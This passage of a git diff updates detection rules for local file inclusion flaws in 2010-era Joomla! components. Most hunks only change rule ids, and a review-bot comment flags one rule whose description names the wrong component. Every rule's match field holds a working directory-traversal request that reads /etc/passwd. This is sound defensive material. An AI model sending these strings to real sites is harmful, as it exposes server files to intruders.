+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532.yaml
index b3df21b9..76359b0d 100644
--- a/rules/web/web_cve_CVE-2010-1532.yaml
+++ b/rules/web/web_cve_CVE-2010-1532.yaml
@@ -1,24 +1,24 @@
-title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
-id: d1890f8a-ef82-4d0c-a686-bace99bd54f2
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
- component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
+id: 3f5ed59b-1944-4325-b675-5ea2441069f1
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
+ component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533.yaml
index 53b10518..d0566b2f 100644
--- a/rules/web/web_cve_CVE-2010-1533.yaml
+++ b/rules/web/web_cve_CVE-2010-1533.yaml
@@ -1,23 +1,23 @@
-title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion
-id: 432ecccc-dfd6-4c0f-8173-0f57f8eafe46
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
- 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion
+id: fb9d6f93-d5ce-45e5-abf4-51b092d082a2
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
+ 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535.yaml
index f5d20bce..3f94a2df 100644
--- a/rules/web/web_cve_CVE-2010-1535.yaml
+++ b/rules/web/web_cve_CVE-2010-1535.yaml
@@ -1,24 +1,24 @@
-title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
-id: 36a64564-5ba1-40ff-a85f-6a0a11215c35
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
- component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
+id: 74d51ae3-410b-4654-bb2d-20cca140a39c
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
+ component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602.yaml
index e57fe8fe..6703b9a5 100644
--- a/rules/web/web_cve_CVE-2010-1602.yaml
+++ b/rules/web/web_cve_CVE-2010-1602.yaml
@@ -1,26 +1,26 @@
-title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
-id: e9519f69-b3b8-4695-88bb-5bf2d34e40aa
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
- component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/12283
-- https://www.cvedetails.com/cve/CVE-2010-1602
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
+id: 78b8be95-2dac-4660-867b-3096670f1801
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
+ component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/12283
+- https://www.cvedetails.com/cve/CVE-2010-1602
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657.yaml
index 614266e8..8cc04a14 100644
--- a/rules/web/web_cve_CVE-2010-1657.yaml
+++ b/rules/web/web_cve_CVE-2010-1657.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion
-id: b32928f2-521b-4e3b-b34c-cb49617727ca
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
- 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12428
-- https://www.cvedetails.com/cve/CVE-2010-1657
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion
+id: 1b858384-5226-47df-beb9-d9162c63b0da
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
+ 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12428
+- https://www.cvedetails.com/cve/CVE-2010-1657
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718.yaml
index ae4b53e3..22aa3401 100644
--- a/rules/web/web_cve_CVE-2010-1718.yaml
+++ b/rules/web/web_cve_CVE-2010-1718.yaml
@@ -1,24 +1,24 @@
-title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
-id: 60f6f1f4-0312-4416-bb31-fd376a59ce7b
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in archeryscores.php in the Archery
- Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to
- include and execute arbitrary local files via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
+id: 7f99cad1-85b6-4521-801e-aa27fa249207
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in archeryscores.php in the Archery
+ Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to
+ include and execute arbitrary local files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722.yaml
index f8de4108..0fc9c72a 100644
--- a/rules/web/web_cve_CVE-2010-1722.yaml
+++ b/rules/web/web_cve_CVE-2010-1722.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion
-id: e33e435a-51b1-416d-b0f3-0965a0b73af9
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Online Market (com_market) component
- 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have
- unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12177
-- https://www.cvedetails.com/cve/CVE-2010-1722
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion
+id: 2de26e96-5594-4743-a74b-d8687d807efa
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Online Market (com_market) component
+ 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12177
+- https://www.cvedetails.com/cve/CVE-2010-1722
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875.yaml
index 48c7d585..d85a45fc 100644
--- a/rules/web/web_cve_CVE-2010-1875.yaml
+++ b/rules/web/web_cve_CVE-2010-1875.yaml
@@ -1,26 +1,26 @@
-title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion
-id: d989a93e-8f69-4419-876d-12bd5f9bfc19
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Real Estate Property (com_properties)
- component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files
- and possibly have unspecified other impact via a .. (dot dot) in the controller
- parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/11851
-- https://www.cvedetails.com/cve/CVE-2010-1875
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion
+id: b2fa9b8b-da34-4598-b0dd-a77e409f786a
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Real Estate Property (com_properties)
+ component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files
+ and possibly have unspecified other impact via a .. (dot dot) in the controller
+ parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/11851
+- https://www.cvedetails.com/cve/CVE-2010-1875
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953.yaml
index aed73819..7317ab8e 100644
--- a/rules/web/web_cve_CVE-2010-1953.yaml
+++ b/rules/web/web_cve_CVE-2010-1953.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
-id: 88a112bd-6581-4492-8d76-5c984d738c09
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
- component 1.0 for Joomla! allows remote attackers to read arbitrary files via a
- .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12288
-- https://www.cvedetails.com/cve/CVE-2010-1953
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
+id: 0dcfbc60-2e37-4b43-a916-19cb2b8566d1
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
+ component 1.0 for Joomla! allows remote attackers to read arbitrary files via a
+ .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12288
+- https://www.cvedetails.com/cve/CVE-2010-1953
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1954.yaml b/rules/web/web_cve_CVE-2010-1954.yaml
new file mode 100644
index 00000000..4b769808
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1954.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1954:Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
+id: b669a952-66dd-4336-9372-1a91f0f7df69
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
+ component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955.yaml
index c74eeaa7..cfbab60f 100644
--- a/rules/web/web_cve_CVE-2010-1955.yaml
+++ b/rules/web/web_cve_CVE-2010-1955.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
-id: 5eeaa5a1-e6d1-46f8-9bf3-ef141d6733f9
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
- component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via
- a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12238
-- https://www.cvedetails.com/cve/CVE-2010-1955
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
+id: 25f05d16-2cb0-442b-9902-d3ad8cff11f7
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
+ component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via
+ a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12238
+- https://www.cvedetails.com/cve/CVE-2010-1955
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979.yaml
index ddd153dc..02ca8a2a 100644
--- a/rules/web/web_cve_CVE-2010-1979.yaml
+++ b/rules/web/web_cve_CVE-2010-1979.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
-id: 0221e773-afea-48bf-b3b2-dd60ed509720
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
- component build 880 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12088
-- https://www.cvedetails.com/cve/CVE-2010-1979
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
+id: 8d003d22-516d-445b-a8cf-809065ec3d2a
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
+ component build 880 for Joomla! allows remote attackers to read arbitrary files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12088
+- https://www.cvedetails.com/cve/CVE-2010-1979
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983.yaml
index 2d8c8113..e3de690f 100644
--- a/rules/web/web_cve_CVE-2010-1983.yaml
+++ b/rules/web/web_cve_CVE-2010-1983.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion
-id: b205e0d0-b61a-4a7a-a8db-45225cad643f
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
- component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary
- files via a .. (dot dot) in the view parameter to index.php
-references:
-- https://www.exploit-db.com/exploits/12055
-- https://www.cvedetails.com/cve/CVE-2010-1983
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion
+id: ef76c1fe-3653-4530-b55b-0676b399c927
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
+ component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary
+ files via a .. (dot dot) in the view parameter to index.php
+references:
+- https://www.exploit-db.com/exploits/12055
+- https://www.cvedetails.com/cve/CVE-2010-1983
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033.yaml
index de4c9b39..12a5c02e 100644
--- a/rules/web/web_cve_CVE-2010-2033.yaml
+++ b/rules/web/web_cve_CVE-2010-2033.yaml
@@ -1,26 +1,26 @@
-title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion
-id: d61b5ebd-9dc8-4dc5-b377-5e7cabfde00e
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
- component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
- have unspecified other impact via a .. (dot dot) in the controller parameter to
- index.php.
-references:
-- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
-- https://www.cvedetails.com/cve/CVE-2010-2033
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion
+id: f953c147-a017-4f36-a20f-64c8bf4ec31a
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
+ component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
+ have unspecified other impact via a .. (dot dot) in the controller parameter to
+ index.php.
+references:
+- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
+- https://www.cvedetails.com/cve/CVE-2010-2033
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036.yaml
index b3132266..0057029c 100644
--- a/rules/web/web_cve_CVE-2010-2036.yaml
+++ b/rules/web/web_cve_CVE-2010-2036.yaml
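Review bot: The `description` on the new side of this hunk describes the Percha Fields Attach (com_perchafieldsattach) component, while the `title`, the packetstormsecurity reference and the `c-uri|contains` value (`option=com_perchacategoriestree`) all concern Percha Categories Tree 0.6; the wording is identical to the CVE-2010-2036 rule that follows, so it appears to have been copied from there. A rule whose description names a different component than its detection misleads anyone triaging a hit, and the mismatch survives this commit because only `id` was regenerated. The first description line should name the component the rule actually matches, along the lines of `description: Directory traversal vulnerability in the Percha Categories Tree (com_perchacategoriestree) component 0.6 for Joomla! ...`, with the remainder adjusted to the advisory for CVE-2010-2033.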
@@ -1,26 +1,26 @@
-title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
-id: 1859e4d6-2965-4bee-897f-bded883e7364
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
- component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
- have unspecified other impact via a .. (dot dot) in the controller parameter to
- index.php.
-references:
-- https://www.exploit-db.com/exploits/34004
-- https://www.cvedetails.com/cve/CVE-2010-2036
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
+id: 3036ae41-8549-429e-ba64-a3dd5991f7f2
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
+ component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
+ have unspecified other impact via a .. (dot dot) in the controller parameter to
+ index.php.
+references:
+- https://www.exploit-db.com/exploits/34004
+- https://www.cvedetails.com/cve/CVE-2010-2036
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259.yaml
index 3b175aca..2dd1e173 100644
--- a/rules/web/web_cve_CVE-2010-2259.yaml
+++ b/rules/web/web_cve_CVE-2010-2259.yaml
@@ -1,25 +1,25 @@
-title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion
-id: 0f74c630-3e11-41d3-8352-66961fc12085
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
- for Joomla! allows remote attackers to include and execute arbitrary local files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/10946
-- https://www.cvedetails.com/cve/CVE-2010-2259
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion
